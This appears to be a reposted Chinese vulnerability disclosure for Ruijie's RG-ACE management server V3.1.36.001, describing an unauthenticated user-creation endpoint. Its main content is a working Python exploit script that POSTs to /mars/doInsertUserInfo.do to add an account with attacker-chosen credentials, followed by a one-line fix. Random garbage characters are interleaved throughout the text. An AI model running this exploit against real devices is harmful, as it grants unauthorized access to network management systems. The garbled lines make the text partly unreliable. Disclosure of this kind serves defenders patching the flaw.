锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

) u. R" y/ q' t# z  R' o# H
测试的具体版本是
- W2 c  P! T& {; ^; s产品名称: 锐捷应用控制引擎
% O0 n, m+ ?( y3 ~6 L) ?& ~版本号: 3.1.36.001 TC
编译时间: 201104291730
: K# |$ Y+ e0 \" J8 u

$ J5 N+ Z) ?% |- X' A( B漏洞证明：
( P% Y) F7 G, ?- [4 u  ^
0 X. l2 K8 ?: B3 ^% b: G$ F/ y
/ t* A$ z# ^4 U  G1 z. c# [



( v9 G, y0 i  {  m执行脚本
, U+ k, O: s2 [9 ~( k5 N* k#! /usr/bin/env python
6 f/ ?5 D# K, S6 H# d1 ?6 l#coding=gbk
, W( X1 Q2 @* q/ D#RG-ACE管理服务器 V3.1.36.001
* w' Z. e9 b) a" E, timport urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
5 I! c7 o- Y* E+ s) a" a8 N0 Kopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
$ ?# I+ E  ~3 e  M/ Npost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
! _  O  x! j$ D( Z("useropermanager","userManager"),
# B: v; S- G' s; `7 ]("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
0 ~, y' z" N. `# x% ?("mobilePhone",""),
1 E1 X( G9 y; v! w" l("officePhone",""),
("addr",""),
& g: }( `: A: e# g8 M+ J/ G("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

登录，连接设备



8 a  A$ p3 }! A! O

1 M/ i0 o! o9 o6 ^& X默认的管理员admin权限更大点
" R  }- M. B- a  n$ M- A

% N, L4 O3 g* c( Y& ?/ A

, I' g! m% o  @
修复方案：
& ~! f+ n! v5 L7 {0 j加强对接口的权限验证